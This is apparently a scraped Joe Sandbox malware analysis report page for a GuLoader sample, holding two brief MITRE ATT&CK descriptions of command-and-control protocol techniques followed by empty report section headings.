Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report JXblq0dqPN.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets